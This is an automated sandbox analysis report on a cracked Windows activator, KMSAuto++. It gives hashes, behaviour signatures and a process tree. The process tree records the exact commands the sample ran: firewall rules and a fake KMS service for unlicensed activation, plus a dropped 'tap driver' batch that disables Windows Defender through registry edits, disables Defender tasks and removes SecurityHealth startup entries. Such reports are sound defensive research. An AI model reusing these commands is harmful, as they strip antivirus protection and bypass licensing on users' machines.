Analysis

  • max time kernel
    106s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20221111-es
  • resource tags

    arch:x64arch:x86image:win7-20221111-eslocale:es-esos:windows7-x64systemwindows
  • submitted
    06-02-2023 17:00

General

  • Target

    KMSAuto++v1.6.4.exe

  • Size

    718.9MB

  • MD5

    ef8cd375fdc780a87dbf601860994ab9

  • SHA1

    b0aac6fb4006091219ba82a5838e810e0e27beba

  • SHA256

    a6856516f42de63846610b121a0585472e252d40ffcaddba201c3b5fa2abb520

  • SHA512

    52db73a1bc0df076f74ed5fcb4d50ca7e46de6b7ee57cb7ee0223c96635dd01e4cafa403079fdeac25a219d402f5fdca608f76c8ed689540cac0d6c11b44c417

  • SSDEEP

    786432:yo0mvb9vOggaeuNz9jMWZZ7vHMH85G1p14NPlT2sp:yavx2ggaL11MccpyPR2

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 10 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 18 IoCs
  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Launches sc.exe 6 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe
    "C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Users\Admin\kms driver.exe
      "C:\Users\Admin\kms driver.exe"
      2⤵
      • Executes dropped EXE
      PID:1880
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 1880 -s 584
        3⤵
        • Program crash
        PID:1516
    • C:\Users\Admin\kmsauto++v1.6.4.exe
      "C:\Users\Admin\kmsauto++v1.6.4.exe"
      2⤵
      • Sets service image path in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:520
      • C:\Windows\system32\cmd.exe
        "C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSAuto "C:\Users\Admin\AppData\Local\Temp\KMSAuto.tmp" /Y
        3⤵
          PID:1144
        • C:\Users\Admin\AppData\Local\Temp\signtool.exe
          "C:\Users\Admin\AppData\Local\Temp\signtool.exe" verify /v /ph /sha1 648384a4dee53d4c1c87e10d67cc99307ccc9c98 "C:\Users\Admin\kmsauto++v1.6.4.exe"
          3⤵
          • Executes dropped EXE
          • Modifies system certificate store
          PID:1652
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          "wmic.exe" path Win32_NetworkAdapter get ServiceName /value /FORMAT:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1416
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          "wmic.exe" path SoftwareLicensingProduct where (Name LIKE 'Windows%%') get Name, Description, ID, PartialProductKey, LicenseStatus, KeyManagementServiceMachine, KeyManagementServicePort, VLRenewalInterval, GracePeriodRemaining, KeyManagementServicePort, KeyManagementServiceProductKeyID /FORMAT:List
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1808
        • C:\Windows\SysWOW64\Wbem\wmic.exe
          "wmic.exe" path SoftwareLicensingService get Version /value /FORMAT:List
          3⤵
            PID:1532
          • C:\Windows\system32\cmd.exe
            "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
            3⤵
              PID:1908
              • C:\Windows\system32\netsh.exe
                Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
                4⤵
                • Modifies Windows Firewall
                PID:1916
            • C:\Windows\system32\cmd.exe
              "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=1688
              3⤵
                PID:928
                • C:\Windows\system32\netsh.exe
                  Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=1688
                  4⤵
                  • Modifies Windows Firewall
                  PID:844
              • C:\Windows\system32\cmd.exe
                "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
                3⤵
                  PID:1156
                  • C:\Windows\system32\netsh.exe
                    Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
                    4⤵
                    • Modifies Windows Firewall
                    PID:652
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=1688
                  3⤵
                    PID:1516
                    • C:\Windows\system32\netsh.exe
                      Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=1688
                      4⤵
                      • Modifies Windows Firewall
                      PID:896
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\Sysnative\cmd.exe" /c sc.exe create KMSEmulator binpath= temp.exe type= own start= auto
                    3⤵
                      PID:1276
                      • C:\Windows\system32\sc.exe
                        sc.exe create KMSEmulator binpath= temp.exe type= own start= auto
                        4⤵
                        • Launches sc.exe
                        PID:1048
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\Sysnative\cmd.exe" /c sc.exe start KMSEmulator
                      3⤵
                        PID:1592
                        • C:\Windows\system32\sc.exe
                          sc.exe start KMSEmulator
                          4⤵
                          • Launches sc.exe
                          PID:1380
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
                        3⤵
                          PID:1632
                          • C:\Windows\System32\reg.exe
                            reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
                            4⤵
                              PID:984
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
                            3⤵
                              PID:1652
                              • C:\Windows\System32\reg.exe
                                reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
                                4⤵
                                  PID:1744
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
                                3⤵
                                  PID:1316
                                  • C:\Windows\System32\reg.exe
                                    reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
                                    4⤵
                                      PID:776
                                  • C:\Windows\system32\cmd.exe
                                    "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
                                    3⤵
                                      PID:1184
                                      • C:\Windows\System32\reg.exe
                                        reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
                                        4⤵
                                          PID:1976
                                      • C:\Windows\system32\cmd.exe
                                        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
                                        3⤵
                                          PID:1896
                                          • C:\Windows\System32\reg.exe
                                            reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
                                            4⤵
                                              PID:636
                                          • C:\Windows\system32\cmd.exe
                                            "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
                                            3⤵
                                              PID:1596
                                              • C:\Windows\System32\reg.exe
                                                reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
                                                4⤵
                                                  PID:1256
                                              • C:\Windows\system32\cmd.exe
                                                "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
                                                3⤵
                                                  PID:1620
                                                  • C:\Windows\System32\reg.exe
                                                    reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
                                                    4⤵
                                                      PID:1628
                                                  • C:\Windows\system32\cmd.exe
                                                    "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
                                                    3⤵
                                                      PID:1088
                                                      • C:\Windows\System32\reg.exe
                                                        reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
                                                        4⤵
                                                          PID:1524
                                                      • C:\Windows\system32\cmd.exe
                                                        "C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:1688
                                                        3⤵
                                                          PID:896
                                                          • C:\Windows\system32\cscript.exe
                                                            cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:1688
                                                            4⤵
                                                              PID:1740
                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                            "wmic.exe" path SoftwareLicensingProduct where (Name LIKE 'Windows%%' And PartialProductKey is Not NULL) get Name, Description, ID, PartialProductKey /FORMAT:List
                                                            3⤵
                                                              PID:1500
                                                            • C:\Windows\system32\cmd.exe
                                                              "C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato
                                                              3⤵
                                                                PID:1812
                                                                • C:\Windows\system32\cscript.exe
                                                                  cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato
                                                                  4⤵
                                                                    PID:1744
                                                                • C:\Windows\system32\slui.exe
                                                                  "C:\Windows\Sysnative\slui.exe" 0x2a 0xC004C003
                                                                  3⤵
                                                                    PID:1308
                                                                  • C:\Windows\system32\cmd.exe
                                                                    "C:\Windows\Sysnative\cmd.exe" /c sc.exe stop KMSEmulator
                                                                    3⤵
                                                                      PID:1620
                                                                      • C:\Windows\system32\sc.exe
                                                                        sc.exe stop KMSEmulator
                                                                        4⤵
                                                                        • Launches sc.exe
                                                                        PID:1880
                                                                    • C:\Windows\system32\cmd.exe
                                                                      "C:\Windows\Sysnative\cmd.exe" /c sc.exe delete KMSEmulator
                                                                      3⤵
                                                                        PID:1244
                                                                        • C:\Windows\system32\sc.exe
                                                                          sc.exe delete KMSEmulator
                                                                          4⤵
                                                                          • Launches sc.exe
                                                                          PID:2012
                                                                      • C:\Windows\system32\cmd.exe
                                                                        "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
                                                                        3⤵
                                                                          PID:512
                                                                          • C:\Windows\system32\netsh.exe
                                                                            Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
                                                                            4⤵
                                                                            • Modifies Windows Firewall
                                                                            PID:480
                                                                        • C:\Windows\system32\cmd.exe
                                                                          "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
                                                                          3⤵
                                                                            PID:1300
                                                                            • C:\Windows\system32\netsh.exe
                                                                              Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
                                                                              4⤵
                                                                              • Modifies Windows Firewall
                                                                              PID:1336
                                                                          • C:\Windows\system32\cmd.exe
                                                                            "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
                                                                            3⤵
                                                                              PID:1916
                                                                              • C:\Windows\system32\netsh.exe
                                                                                Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS protocol=TCP
                                                                                4⤵
                                                                                • Modifies Windows Firewall
                                                                                PID:1760
                                                                            • C:\Windows\system32\cmd.exe
                                                                              "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=1688
                                                                              3⤵
                                                                                PID:1596
                                                                                • C:\Windows\system32\netsh.exe
                                                                                  Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS dir=in action=allow protocol=TCP localport=1688
                                                                                  4⤵
                                                                                  • Modifies Windows Firewall
                                                                                  PID:1156
                                                                              • C:\Windows\system32\cmd.exe
                                                                                "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
                                                                                3⤵
                                                                                  PID:1756
                                                                                  • C:\Windows\system32\netsh.exe
                                                                                    Netsh.exe Advfirewall Firewall delete rule name=0pen_Port_KMS2 protocol=TCP
                                                                                    4⤵
                                                                                    • Modifies Windows Firewall
                                                                                    PID:1308
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  "C:\Windows\Sysnative\cmd.exe" /c Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=1688
                                                                                  3⤵
                                                                                    PID:1448
                                                                                    • C:\Windows\system32\netsh.exe
                                                                                      Netsh.exe Advfirewall Firewall add rule name=0pen_Port_KMS2 dir=out action=allow protocol=TCP localport=1688
                                                                                      4⤵
                                                                                      • Modifies Windows Firewall
                                                                                      PID:1516
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    "C:\Windows\Sysnative\cmd.exe" /c sc.exe create KMSEmulator binpath= temp.exe type= own start= auto
                                                                                    3⤵
                                                                                      PID:988
                                                                                      • C:\Windows\system32\sc.exe
                                                                                        sc.exe create KMSEmulator binpath= temp.exe type= own start= auto
                                                                                        4⤵
                                                                                        • Launches sc.exe
                                                                                        PID:1244
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      "C:\Windows\Sysnative\cmd.exe" /c sc.exe start KMSEmulator
                                                                                      3⤵
                                                                                        PID:1740
                                                                                        • C:\Windows\system32\sc.exe
                                                                                          sc.exe start KMSEmulator
                                                                                          4⤵
                                                                                          • Launches sc.exe
                                                                                          PID:980
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
                                                                                        3⤵
                                                                                          PID:2044
                                                                                          • C:\Windows\System32\reg.exe
                                                                                            reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
                                                                                            4⤵
                                                                                              PID:1500
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
                                                                                            3⤵
                                                                                              PID:1724
                                                                                              • C:\Windows\System32\reg.exe
                                                                                                reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
                                                                                                4⤵
                                                                                                  PID:1744
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
                                                                                                3⤵
                                                                                                  PID:2000
                                                                                                  • C:\Windows\System32\reg.exe
                                                                                                    reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
                                                                                                    4⤵
                                                                                                      PID:1652
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
                                                                                                    3⤵
                                                                                                      PID:1868
                                                                                                      • C:\Windows\System32\reg.exe
                                                                                                        reg.exe add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
                                                                                                        4⤵
                                                                                                          PID:1712
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
                                                                                                        3⤵
                                                                                                          PID:1272
                                                                                                          • C:\Windows\System32\reg.exe
                                                                                                            reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:32
                                                                                                            4⤵
                                                                                                              PID:1668
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
                                                                                                            3⤵
                                                                                                              PID:652
                                                                                                              • C:\Windows\System32\reg.exe
                                                                                                                reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:32
                                                                                                                4⤵
                                                                                                                  PID:1896
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
                                                                                                                3⤵
                                                                                                                  PID:1772
                                                                                                                  • C:\Windows\System32\reg.exe
                                                                                                                    reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /d 127.0.0.2 /t REG_SZ /reg:64
                                                                                                                    4⤵
                                                                                                                      PID:1252
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    "C:\Windows\Sysnative\cmd.exe" /c reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:1588
                                                                                                                      • C:\Windows\System32\reg.exe
                                                                                                                        reg.exe add "HKEY_LOCAL_MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /d 1688 /t REG_SZ /reg:64
                                                                                                                        4⤵
                                                                                                                          PID:1324
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        "C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:1688
                                                                                                                        3⤵
                                                                                                                          PID:1972
                                                                                                                          • C:\Windows\system32\cscript.exe
                                                                                                                            cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /skms 127.0.0.2:1688
                                                                                                                            4⤵
                                                                                                                              PID:320
                                                                                                                          • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                                                                                            "wmic.exe" path SoftwareLicensingProduct where (Name LIKE 'Windows%%' And PartialProductKey is Not NULL) get Name, Description, ID, PartialProductKey /FORMAT:List
                                                                                                                            3⤵
                                                                                                                              PID:688
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              "C:\Windows\Sysnative\cmd.exe" /c cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato
                                                                                                                              3⤵
                                                                                                                                PID:1020
                                                                                                                                • C:\Windows\system32\cscript.exe
                                                                                                                                  cscript //nologo "C:\Users\Admin\AppData\Local\Temp\slmgr.vbs" /ato
                                                                                                                                  4⤵
                                                                                                                                    PID:2044
                                                                                                                                • C:\Windows\system32\slui.exe
                                                                                                                                  "C:\Windows\Sysnative\slui.exe" 0x2a 0xC004C003
                                                                                                                                  3⤵
                                                                                                                                    PID:976
                                                                                                                                • C:\Users\Admin\microsoft tap driver.exe
                                                                                                                                  "C:\Users\Admin\microsoft tap driver.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:1596
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3EF5.tmp\3F05.tmp\3F16.bat "C:\Users\Admin\microsoft tap driver.exe""
                                                                                                                                    3⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:1736
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                                      4⤵
                                                                                                                                        PID:928
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                                        4⤵
                                                                                                                                          PID:1976
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                                                          4⤵
                                                                                                                                            PID:1020
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                            4⤵
                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                            PID:1428
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                                                            4⤵
                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                            PID:1156
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                                                            4⤵
                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                            PID:1924
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                            4⤵
                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                            PID:1416
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                                                            4⤵
                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                            PID:480
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                                                            4⤵
                                                                                                                                              PID:1276
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                                                              4⤵
                                                                                                                                                PID:544
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                                                                4⤵
                                                                                                                                                  PID:972
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2040
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                    4⤵
                                                                                                                                                      PID:316
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                      4⤵
                                                                                                                                                        PID:1808
                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                        schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1972
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                                          4⤵
                                                                                                                                                            PID:396
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                                            4⤵
                                                                                                                                                              PID:1888
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                                                              4⤵
                                                                                                                                                                PID:1636
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:956
                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                  reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1000
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:1760
